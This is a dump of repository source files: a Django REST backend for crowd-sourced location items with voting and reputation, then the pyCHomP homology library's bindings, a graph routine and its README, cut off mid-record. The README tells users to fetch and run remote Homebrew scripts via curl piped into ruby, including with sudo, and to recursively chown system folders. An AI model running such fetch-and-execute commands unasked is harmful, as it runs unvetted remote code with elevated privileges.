'Incorrect Data Sent'}, status=HTTP_400_BAD_REQUEST)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def add_photo(self, request, pk):\n \"\"\"\n add comment of the item\n ---\n request_serializer: AddPhotoSerializer\n \"\"\"\n\n item = self.get_object()\n serialized_data = AddPhotoSerializer(data=request.data)\n if serialized_data.is_valid():\n photo = Photo.objects.create(\n picture=serialized_data.validated_data['picture'],\n item=item,\n author=get_author(request.user),\n )\n recalculate_reputation(photo.author)\n response = {\n 'success': True,\n 'result': PhotoSerializer(photo).data\n }\n return Response(response)\n else:\n return Response({'success': False, 'message': 'Incorrect Data Sent'}, status=HTTP_400_BAD_REQUEST)\n\n\nclass ReactableViewSet(viewsets.ModelViewSet):\n @staticmethod\n def handle_upvote(request, pk, reactable):\n reaction = Reaction.objects.filter(author__user=request.user, reactable=reactable) \\\n .exclude(reaction=ReactionChoices.FLAG).first()\n if reaction:\n reaction.reaction = ReactionChoices.UPVOTE\n reaction.save()\n else:\n Reaction.objects.create(\n reaction=ReactionChoices.UPVOTE,\n reactable=reactable,\n author=get_author(request.user),\n )\n\n reactable.recalculate_votes()\n reactable.recalculate_score()\n reactable.save()\n\n return reactable\n\n @staticmethod\n def handle_downvote(request, pk, reactable):\n reaction = Reaction.objects.filter(author__user=request.user, reactable=reactable) \\\n .exclude(reaction=ReactionChoices.FLAG).first()\n if reaction:\n reaction.reaction = ReactionChoices.DOWNVOTE\n reaction.save()\n\n else:\n Reaction.objects.create(\n reaction=ReactionChoices.DOWNVOTE,\n reactable=reactable,\n author=get_author(request.user),\n )\n\n reactable.recalculate_votes()\n reactable.recalculate_score()\n reactable.save()\n\n return reactable\n\n @staticmethod\n def handle_flag(request, pk, reactable):\n reaction = Reaction.objects.filter(author__user=request.user, reactable=reactable,\n reaction=ReactionChoices.FLAG).first()\n if not reaction:\n Reaction.objects.create(\n reaction=ReactionChoices.FLAG,\n reactable=reactable,\n author=get_author(request.user),\n )\n\n reactable.recalculate_votes()\n reactable.recalculate_score()\n reactable.save()\n\n return reactable\n\n @staticmethod\n def handle_unflag(request, pk, reactable):\n reaction = Reaction.objects.filter(author__user=request.user, reactable=reactable,\n reaction=ReactionChoices.FLAG).first()\n if reaction:\n reaction.delete()\n\n reactable.recalculate_votes()\n reactable.recalculate_score()\n reactable.save()\n\n return reactable\n\n @staticmethod\n def handle_unvote(request, pk, reactable):\n reaction = Reaction.objects.filter(author__user=request.user, reactable=reactable) \\\n .exclude(reaction=ReactionChoices.FLAG).first()\n if reaction:\n reaction.delete()\n\n reactable.recalculate_votes()\n reactable.recalculate_score()\n reactable.save()\n\n return reactable\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def upvote(self, request, pk):\n \"\"\"\n ---\n parameters_strategy:\n form: replace\n \"\"\"\n\n reactable = self.handle_upvote(request, pk, self.get_object())\n recalculate_reputation(reactable.author)\n recalculate_reputation(request.user)\n response = {\n 'result': self.serializer_class(reactable).data\n }\n return Response(response)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def downvote(self, request, pk):\n \"\"\"\n ---\n parameters_strategy:\n form: replace\n \"\"\"\n\n reactable = self.handle_downvote(request, pk, self.get_object())\n recalculate_reputation(reactable.author)\n recalculate_reputation(request.user)\n response = {\n 'result': self.serializer_class(reactable).data\n }\n return Response(response)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def flag(self, request, pk):\n \"\"\"\n ---\n parameters_strategy:\n form: replace\n \"\"\"\n\n reactable = self.handle_flag(request, pk, self.get_object())\n recalculate_reputation(reactable.author)\n recalculate_reputation(request.user)\n response = {\n 'result': self.serializer_class(reactable).data\n }\n return Response(response)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def unvote(self, request, pk):\n \"\"\"\n ---\n parameters_strategy:\n form: replace\n \"\"\"\n\n reactable = self.handle_unvote(request, pk, self.get_object())\n recalculate_reputation(reactable.author)\n recalculate_reputation(request.user)\n response = {\n 'result': self.serializer_class(reactable).data\n }\n return Response(response)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def unflag(self, request, pk):\n \"\"\"\n ---\n parameters_strategy:\n form: replace\n \"\"\"\n\n reactable = self.handle_unflag(request, pk, self.get_object())\n recalculate_reputation(reactable.author)\n recalculate_reputation(request.user)\n response = {\n 'result': self.serializer_class(reactable).data\n }\n return Response(response)\n\n\nclass CommentViewSet(ReactableViewSet):\n queryset = Comment.objects.all()\n serializer_class = CommentSerializer\n permission_classes = [IsAuthenticatedOrReadOnly]\n\n\nclass PhotoViewSet(ReactableViewSet):\n queryset = Photo.objects.all()\n serializer_class = PhotoSerializer\n permission_classes = [IsAuthenticatedOrReadOnly]\n"
},
{
"alpha_fraction": 0.6258357167243958,
"alphanum_fraction": 0.6439828276634216,
"avg_line_length": 29.576642990112305,
"blob_id": "ae85c091195537c565f3f03aacb74593e611dd16",
"content_id": "7b82db36e9deb0f68670edcc34d68cc3d9eec038",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4188,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 137,
"path": "/item/models.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\n\nfrom django.db import models\n\nfrom account.models import UserProfile\n\n\nclass ItemStatusChoices:\n \"\"\"\n Class for the choices in the status field of an Item\n \"\"\"\n\n VERIFIED = 0\n UNVERIFIED = 1\n DELETED = 2\n REMOVED = 3\n\n @classmethod\n def get(cls):\n return [(cls.VERIFIED, 'Verified'),\n (cls.UNVERIFIED, 'Unverified'),\n (cls.DELETED, 'Deleted'),\n (cls.REMOVED, 'Removed')]\n\n\nclass ReactionChoices:\n NONE = 0\n UPVOTE = 1\n DOWNVOTE = 2\n FLAG = 3\n\n @classmethod\n def get(cls):\n return [(cls.NONE, 'None'),\n (cls.UPVOTE, 'Upvote'),\n (cls.DOWNVOTE, 'Downvote'),\n (cls.FLAG, 'Flag')]\n\n\nclass Item(models.Model):\n \"\"\"\n The Location Based Crowd sourced object\n \"\"\"\n\n title = models.TextField(max_length=256, blank=False)\n description = models.TextField(blank=True)\n author = models.ForeignKey(UserProfile)\n rating = models.FloatField(default=0.0)\n latitude = models.FloatField()\n longitude = models.FloatField()\n flags = models.IntegerField(default=0)\n timestamp = models.DateTimeField(auto_now_add=True)\n status = models.IntegerField(choices=ItemStatusChoices.get(), default=ItemStatusChoices.UNVERIFIED)\n\n def recalculate_rating(self):\n self.rating = 0.0\n weight = 0.0\n\n for rating in self.ratings.all():\n rating_weight = 1.0\n # Could be a function of the user : max(0.0, rating.author.reputation)\n\n self.rating += rating.rating * rating_weight\n weight += rating_weight\n\n if weight == 0.0:\n return 0.0\n self.rating /= weight\n\n\nclass Rating(models.Model):\n item = models.ForeignKey(Item, related_name='ratings')\n author = models.ForeignKey(UserProfile)\n rating = models.FloatField(default=0.0)\n\n class Meta:\n unique_together = [['item', 'author']]\n\n\nclass Reactable(models.Model):\n BASE_SCORE = 10.0\n\n upvotes = models.IntegerField(default=0)\n downvotes = models.IntegerField(default=0)\n flags = models.IntegerField(default=0)\n timestamp = models.DateTimeField(auto_now_add=True)\n experience = models.FloatField(default=0)\n\n @staticmethod\n def convert_to_score(count, scale, values=(1, 10, 50, 200, 1000), scores=(1, 2, 4, 8, 16)):\n for index in reversed(range(len(values))):\n if values[index] < count:\n return scores[index]\n\n return 0.0\n\n def recalculate_score(self):\n return self.BASE_SCORE - self.convert_to_score(self.flags, 50, values=(0, 4, 8, 16, 32)) \\\n - self.convert_to_score(self.downvotes, 20, values=(0, 5, 10, 20, 50)) \\\n + self.convert_to_score(self.upvotes, 10)\n\n def recalculate_votes(self):\n self.upvotes = Reaction.objects.filter(reactable=self, reaction=ReactionChoices.UPVOTE).count()\n self.downvotes = Reaction.objects.filter(reactable=self, reaction=ReactionChoices.DOWNVOTE).count()\n self.flags = Reaction.objects.filter(reactable=self, reaction=ReactionChoices.FLAG).count()\n\n\nclass Reaction(models.Model):\n reaction = models.IntegerField(choices=ReactionChoices.get(), default=ReactionChoices.NONE)\n reactable = models.ForeignKey(Reactable, related_name='reactions')\n author = models.ForeignKey(UserProfile)\n timestamp = models.DateTimeField(auto_now_add=True)\n\n\nclass Comment(Reactable):\n item = models.ForeignKey(Item, related_name='comments')\n author = models.ForeignKey(UserProfile)\n description = models.TextField()\n\n class Meta:\n unique_together = [['item', 'author']]\n\n def recalculate_score(self):\n score = super().recalculate_score()\n self.author.reputation += (score - self.experience)\n self.experience = score\n\n\nclass Photo(Reactable):\n item = models.ForeignKey(Item, related_name='photos')\n author = models.ForeignKey(UserProfile)\n picture = models.ImageField()\n\n def recalculate_score(self):\n score = super().recalculate_score()\n self.author.reputation += (score - self.experience)\n self.experience = score"
},
{
"alpha_fraction": 0.560272753238678,
"alphanum_fraction": 0.5692917108535767,
"avg_line_length": 47.36170196533203,
"blob_id": "02f95a5610c58d37d425a31742056fd822e6357c",
"content_id": "936967d6a530f77a069604cc410ead51128be2ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4546,
"license_type": "no_license",
"max_line_length": 194,
"num_lines": 94,
"path": "/item/migrations/0001_initial.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.4 on 2016-04-07 12:42\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('account', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Item',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.TextField(max_length=256)),\n ('description', models.TextField(blank=True)),\n ('rating', models.FloatField(default=0.0)),\n ('latitude', models.FloatField()),\n ('longitude', models.FloatField()),\n ('flags', models.IntegerField(default=0)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('status', models.IntegerField(choices=[(0, 'Verified'), (1, 'Unverified'), (2, 'Deleted'), (3, 'Removed')], default=1)),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='account.UserProfile')),\n ],\n ),\n migrations.CreateModel(\n name='Rating',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('rating', models.FloatField(default=0.0)),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='account.UserProfile')),\n ('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ratings', to='item.Item')),\n ],\n ),\n migrations.CreateModel(\n name='Reactable',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('upvotes', models.IntegerField(default=0)),\n ('downvotes', models.IntegerField(default=0)),\n ('flags', models.IntegerField(default=0)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='Reaction',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('reaction', models.IntegerField(choices=[(0, 'None'), (1, 'Like'), (2, 'Dislike'), (3, 'Flag')], default=0)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='account.UserProfile')),\n ],\n ),\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('reactable_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='item.Reactable')),\n ('description', models.TextField()),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='account.UserProfile')),\n ('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='item.Item')),\n ],\n bases=('item.reactable',),\n ),\n migrations.CreateModel(\n name='Photo',\n fields=[\n ('reactable_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='item.Reactable')),\n ('picture', models.ImageField(upload_to='')),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='account.UserProfile')),\n ('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='photos', to='item.Item')),\n ],\n bases=('item.reactable',),\n ),\n migrations.AddField(\n model_name='reaction',\n name='reactable',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='item.Reactable'),\n ),\n migrations.AlterUniqueTogether(\n name='rating',\n unique_together=set([('item', 'author')]),\n ),\n migrations.AlterUniqueTogether(\n name='comment',\n unique_together=set([('item', 'author')]),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7534659504890442,
"alphanum_fraction": 0.7534659504890442,
"avg_line_length": 24.121212005615234,
"blob_id": "a23b15f14dddc19bf0ef0bd88eab681a5bc48c52",
"content_id": "f4a7c38b7ee3b2049e93e64963381d405a486c1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1659,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 66,
"path": "/item/serializers.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from rest_framework import serializers\n\nfrom account.serializers import UserProfileSerializer\nfrom item.models import Item, Comment, Photo, Rating\n\n\nclass ItemSerializer(serializers.ModelSerializer):\n author = UserProfileSerializer()\n\n class Meta:\n model = Item\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n author = UserProfileSerializer()\n\n class Meta:\n model = Comment\n\n\nclass PhotoSerializer(serializers.ModelSerializer):\n author = UserProfileSerializer()\n\n class Meta:\n model = Photo\n\n\nclass RatingSerializer(serializers.ModelSerializer):\n author = UserProfileSerializer()\n\n class Meta:\n model = Rating\n\n\nclass CreateItemSerializer(serializers.Serializer):\n title = serializers.CharField()\n description = serializers.CharField()\n latitude = serializers.FloatField()\n longitude = serializers.FloatField()\n\n\nclass UpdateItemSerializer(serializers.Serializer):\n title = serializers.CharField()\n description = serializers.CharField()\n\n\nclass AddRatingSerializer(serializers.Serializer):\n rating = serializers.FloatField()\n\n\nclass AddCommentSerializer(serializers.Serializer):\n description = serializers.CharField()\n\n\nclass AddPhotoSerializer(serializers.Serializer):\n picture = serializers.ImageField()\n\n\nclass BoundingBoxSerializer(serializers.Serializer):\n min_latitude = serializers.FloatField()\n max_latitude = serializers.FloatField()\n min_longitude = serializers.FloatField()\n max_longitude = serializers.FloatField()\n\n def validate_values(self):\n return self.min_latitude <= self.max_latitude and self.min_longitude <= self.max_longitude\n\n"
},
{
"alpha_fraction": 0.6416819095611572,
"alphanum_fraction": 0.645338237285614,
"avg_line_length": 27.05128288269043,
"blob_id": "a51cebebf1d12eb5d8f41716b8d80483830be42c",
"content_id": "2183027c0b2295652fb59b3362051db3e4b61a58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1094,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 39,
"path": "/account/models.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\n\nimport uuid\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils import timezone\n\n\nclass UserProfile(models.Model):\n user = models.ForeignKey(User)\n reputation = models.FloatField(default=0)\n\n def __str__(self):\n return self.user.first_name + '[' + self.user.email + ']'\n\n\nclass UserToken(models.Model):\n user = models.ForeignKey(User)\n token = models.UUIDField(default=uuid.uuid4, editable=False, db_index=True, unique=True)\n created = models.DateTimeField(auto_now_add=True)\n last_accessed = models.DateTimeField(default=timezone.now)\n has_expired = models.BooleanField(default=False)\n\n def is_active(self):\n if self.has_expired:\n return False\n\n current_date = timezone.now()\n diff = abs((current_date - self.last_accessed).days)\n\n if diff > 30:\n self.has_expired = True\n self.save()\n return False\n else:\n self.last_accessed = current_date\n self.save()\n return True\n"
},
{
"alpha_fraction": 0.7668161392211914,
"alphanum_fraction": 0.7668161392211914,
"avg_line_length": 23.77777862548828,
"blob_id": "96d3394ebde2cc2c9c0beb87d7d6cac4ff4d923a",
"content_id": "846714c150f0986f7c6d34e513b378f35f293633",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 223,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 9,
"path": "/account/admin.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom account.models import UserProfile\n\n\[email protected](UserProfile)\nclass UserProfileAdmin(admin.ModelAdmin):\n list_display = ['id', 'user', 'reputation']\n"
}
] | 10 |
Sompus/Hand-tracker-
|
https://github.com/Sompus/Hand-tracker-
|
618490b4d7cdcaa1d0c453288194b86d37b31ef1
|
9aa1e6286228b0b8e201befa98a3a601aa6f7bc8
|
014e1ef1b98d379fda32987a67da8382f3728333
|
refs/heads/main
| 2023-07-13T13:25:35.992095 | 2021-08-02T08:43:01 | 2021-08-02T08:43:01 | 391,870,853 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4725091755390167,
"alphanum_fraction": 0.49916693568229675,
"avg_line_length": 32.4942512512207,
"blob_id": "30d246d07ace1a1cbea44d2d11c130adddac5930",
"content_id": "039989317bb928f10843723bcdf6f460c5089eab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3001,
"license_type": "no_license",
"max_line_length": 210,
"num_lines": 87,
"path": "/Basics.py",
"repo_name": "Sompus/Hand-tracker-",
"src_encoding": "UTF-8",
"text": "import mediapipe as mp\r\nimport cv2\r\nimport numpy as np\r\nimport uuid\r\nimport os\r\n\r\nmp_drawing = mp.solutions.drawing_utils\r\nmp_hands = mp.solutions.hands\r\n\r\ncap = cv2.VideoCapture (0)\r\n\r\nwith mp_hands.Hands (min_detection_confidence = 0.8, min_tracking_confidence = 0.5) as hands :\r\n while cap.isOpened () :\r\n ret, frame = cap.read ()\r\n\r\n image = cv2.cvtColor (frame, cv2.COLOR_BGR2RGB)\r\n\r\n image = cv2.flip (image, 1)\r\n\r\n image.flags.writeable = False\r\n \r\n results = hands.process (image)\r\n\r\n image.flags.writeable = True\r\n\r\n image = cv2.cvtColor (image, cv2.COLOR_RGB2BGR)\r\n\r\n print (results)\r\n\r\n if results.multi_hand_landmarks :\r\n for num, hand in enumerate (results.multi_hand_landmarks) :\r\n mp_drawing.draw_landmarks (image, hand, mp_hands.HAND_CONNECTIONS,\r\n mp_drawing.DrawingSpec (color = (121, 22, 76), thickness = 2,\r\n circle_radius = 4),\r\n mp_drawing.DrawingSpec (color = (250, 44, 250), thickness = 2,\r\n circle_radius = 2),\r\n )\r\n\r\n cv2.imshow ('Traker', image)\r\n\r\n if cv2.waitKey (10) & 0xFF == ord ('q') :\r\n break\r\n\r\ncap.release ()\r\ncv2.destroyAllWindows ()\r\n\r\nmp_drawing.DrawingSpec\r\n\r\nos.mkdir('Output Images')\r\n\r\ncap = cv2.VideoCapture (0)\r\n\r\nwith mp_hands.Hands (min_detection_confidence = 0.8, min_tracking_confidence = 0.5) as hands :\r\n while cap.isOpened () :\r\n ret, frame = cap.read ()\r\n\r\n image = cv2.cvtColor (frame, cv2.COLOR_BGR2RGB)\r\n\r\n image = cv2.flip (image, 1)\r\n\r\n image.flags.writeable = False\r\n\r\n results = hands.process (image)\r\n\r\n image.flags.writeable = True\r\n\r\n image = cv2.cvtColor (image, cv2.COLOR_RGB2BGR)\r\n\r\n print (results)\r\n\r\n if results.multi_hand_landmarks :\r\n for num, hand in enumerate (results.multi_hand_landmarks) :\r\n mp_drawing.draw_landmarks (image, hand, mp_hands.HAND_CONNECTIONS,\r\n mp_drawing.DrawingSpec (color = (50, 205, 50), thickness = 2, #You can change the colors if you want, check for code \"https://flaviocopes.com/rgb-color-codes/\"\r\n circle_radius = 3),\r\n mp_drawing.DrawingSpec (color = (0, 206, 209), thickness = 2,\r\n circle_radius = 2),\r\n )\r\n\r\n cv2.imwrite (os.path.join ('Output Images', '{}.jpg'.format (uuid.uuid1 ())), image)\r\n cv2.imshow ('Tracker', image)\r\n\r\n if cv2.waitKey (10) & 0xFF == ord ('q') :\r\n break\r\n\r\ncap.release ()\r\ncv2.destroyAllWindows ()\r\n"
},
{
"alpha_fraction": 0.80402010679245,
"alphanum_fraction": 0.80402010679245,
"avg_line_length": 23.75,
"blob_id": "55c9a999c0db646753cf867e034213c48f7079fd",
"content_id": "69a8087c88f29153fec3017cd0dd122314444972",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 244,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 8,
"path": "/README.md",
"repo_name": "Sompus/Hand-tracker-",
"src_encoding": "UTF-8",
"text": "# Hand-tracker- For fun\n\nПеред тем как начать работу пропишите в терминале это:\npip install mediapipe opencv-python\n\n\nBefore starting write this in the terminal:\npip install mediapipe opencv-python\n\n"
}
] | 2 |
shaunharker/pyCHomP
|
https://github.com/shaunharker/pyCHomP
|
3731a78f63c6d2845d4b39b20e17358760741111
|
2c5a0e6ea5f1da107bbf20c09a2194aa0fbaf6db
|
c4b817f756f2f00fc145d9c82b40ed8055989016
|
refs/heads/master
| 2021-07-03T19:19:41.618107 | 2019-04-10T18:30:43 | 2019-04-10T18:30:43 | 109,848,079 | 5 | 8 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7376573085784912,
"alphanum_fraction": 0.7550823092460632,
"avg_line_length": 22.477272033691406,
"blob_id": "33d4dc87c5543225ed3b766eae1958f4de6325df",
"content_id": "c80a8dfbaa0e62f2825414b67ba0c3c247d8250f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1033,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 44,
"path": "/src/pychomp/_chomp/chomp.cpp",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// chompy.cpp\n/// Shaun Harker\n/// 2017-07-20\n/// MIT LICENSE\n\n#include \"Integer.h\"\n#include \"Iterator.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"CubicalComplex.h\"\n#include \"MorseComplex.h\"\n#include \"MorseMatching.h\"\n#include \"MorseMatching.hpp\"\n#include \"CubicalMorseMatching.h\"\n#include \"GenericMorseMatching.h\"\n#include \"Homology.h\"\n#include \"GradedComplex.h\"\n#include \"MorseGradedComplex.h\"\n#include \"ConnectionMatrix.h\"\n#include \"Grading.h\"\n#include \"SimplicialComplex.h\"\n#include \"OrderComplex.h\"\n#include \"DualComplex.h\"\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\nPYBIND11_MODULE( _chomp, m) {\n ComplexBinding(m);\n CubicalComplexBinding(m);\n MorseMatchingBinding(m);\n CubicalMorseMatchingBinding(m);\n GenericMorseMatchingBinding(m);\n MorseComplexBinding(m);\n HomologyBinding(m);\n GradedComplexBinding(m);\n MorseGradedComplexBinding(m);\n ConnectionMatrixBinding(m);\n GradingBinding(m);\n SimplicialComplexBinding(m);\n OrderComplexBinding(m);\n DualComplexBinding(m);\n}\n"
},
{
"alpha_fraction": 0.5600528120994568,
"alphanum_fraction": 0.5666519999504089,
"avg_line_length": 29.70270347595215,
"blob_id": "76cadb28d09a2831f94fb4c6c0b9c3a9bb40432b",
"content_id": "87a67e751e89ce3100be82e5349554417adeeb83",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2273,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 74,
"path": "/src/pychomp/StronglyConnectedComponents.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "### StronglyConnectedComponents.py\n### MIT LICENSE 2016 Shaun Harker\n\ndef StronglyConnectedComponents(vertices_input, adjacencies_input):\n \"\"\"\n Overview:\n Compute the strongly connected components.\n Inputs:\n vertices_input : a collection of vertices\n adjacencies_input : a function which takes a vertex and gives the adjacency list\n \"\"\"\n\n # We translate the vertices to contiguous integers\n # via a list \"vertices\" and a dictionary \"numbering\"\n vertices = list(vertices_input)\n N = len(vertices)\n numbering = { v : i+1 for i, v in enumerate(vertices) }\n\n # We wrap the adjacencies list to use our contiguous integer indexing\n def Adjacencies(v):\n vertex = vertices[v-1]\n return [ numbering[u] for u in adjacencies_input(vertex)]\n\n # Data structures\n DFS = []\n S = []\n LOWLINK = [0] # dummy sentinel\n result = []\n index = {}\n explored = set() #TODO, use array\n committed = set() #TODO, use array\n n = [0] # language caveat note: using list of one integer to capture variable and assign to it in \"preorder\" \n # Preorder step \n def preorder(v):\n if v in explored:\n return\n DFS.append(-v)\n explored.add(v)\n link = n[0]\n index[v] = link\n n[0] += 1\n for u in Adjacencies(v):\n if u not in explored:\n DFS.append(u)\n elif u not in committed:\n link = min(link, index[u])\n LOWLINK.append(link)\n S.append(v)\n\n # Postorder step \n def postorder(v):\n lowlink = LOWLINK.pop()\n if lowlink == index[v]:\n SCC = []\n while v not in committed: #out of order? I had a do-while loop\n u = S.pop()\n SCC.append(u)\n committed.add(u)\n result.append(SCC)\n link = LOWLINK.pop()\n link = min(link, lowlink)\n LOWLINK.append(link)\n\n # Main routine\n DFS = list(range(1,N+1))\n while DFS:\n u = DFS.pop()\n if u > 0:\n preorder(u)\n else:\n postorder(-u)\n #Return result\n # Convert results to lists of vertices as originally given\n return [ [ vertices[v-1] for v in component ] for component in result ]\n\n"
},
{
"alpha_fraction": 0.7389649748802185,
"alphanum_fraction": 0.7423896789550781,
"avg_line_length": 24.009523391723633,
"blob_id": "c18b3f7d3797d1ce8ede2f32e2cd170516f3da21",
"content_id": "3acdd35babc43aaed96c2574bcb3c0185e5377ad",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2628,
"license_type": "permissive",
"max_line_length": 334,
"num_lines": 105,
"path": "/README.md",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# pyCHomP\n\nCHomP (Computational Homology Project) with Python bindings\n\n## Installation\n\nTo get the latest tagged version from the PyPi repository:\n\n```bash\npip install pychomp\n```\n\nTo uninstall:\n\n```bash\npip uninstall pychomp\n```\n\n\n## Installing from source\n\nTo get the bleeding edge version (i.e., this repo):\n\n```bash\ngit clone https://github.com/shaunharker/pyCHomP.git\ncd pyCHomP\ngit submodule update --init --recursive\npip install . --ignore-installed --no-cache-dir -v -v -v --user\n```\n\n## Troubleshooting\n\n### Can't get it to work with your version of python\n\nTry Anaconda3 <https://www.anaconda.com>.\n\nThis will install into a folder named `anaconda3` and add a line in `~/.bash_profile`:\n\n```bash\n#added by Anaconda3 5.0.1 installer\n#export PATH=\"/PATH/TO/anaconda3/bin:$PATH\"\n```\n\nThis will redirect command line python and pip. Note you may have to start a new `bash` session for the path changes to take effect (i.e. close and reopen the terminal program). This has the effect of plastering over any problems you might be having with multiple installations/permissions problems/jupyter not seeing the package/etc.\n\nAfter installing this,\n\n```\npip install jupyter\n```\n\nand try the installation above again.\n\n### For macOS users who don't want anaconda but instead want to use `homebrew` python:\n\nIf the installation gives permissions issues, oftentimes the culprit is broken permissions on the subfolders of the homebrew folder `/usr/local`. \n\nFirst, see what\n\n```\nbrew doctor\n```\n\nsays. A common fix is:\n\n```\nsudo chown -R $(whoami) $(brew --prefix)/*\n```\n\nIf it still doesn't work after this, then you might try uninstalling and reinstalling homebrew.\n\nTo uninstall homebrew:\n\n```\nruby -e \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/uninstall)\"\n```\n\nOr `sudo` if it gives issues:\n\n```\nsudo ruby -e \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/uninstall)\"\n```\n\nTo install homebrew (don't use `sudo` here!):\n\n```\nruby -e \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)\"\n```\n\n### Python/Jupyter Integration issues:\n\nIf the package installs but it is not visible in jupyter, the likely problem is that the jupyter python kernel is not the same python for which pychomp was installed. That is, you may have multiple pythons on your system.\n\nYou can try to confirm this by typing\n\n```\nwhich python\nwhich pip\nwhich jupyter\n```\n\nPossible fixes include steps such as \n\n1. checking/changing your environmental variable `PATH` in `~/.bash_profile` or `.bashrc`\n2. uninstalling python and jupyter, then reinstalling python then jupyter\n\n\n"
},
{
"alpha_fraction": 0.6276223659515381,
"alphanum_fraction": 0.6520978808403015,
"avg_line_length": 18.724138259887695,
"blob_id": "8aeb5de34c56d6ee75e7882aff450e11c3b9e8d5",
"content_id": "f09219a38fe5b08eb01aa1c0d0ef5cfe46e600bd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 572,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 29,
"path": "/src/pychomp/_chomp/include/common.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
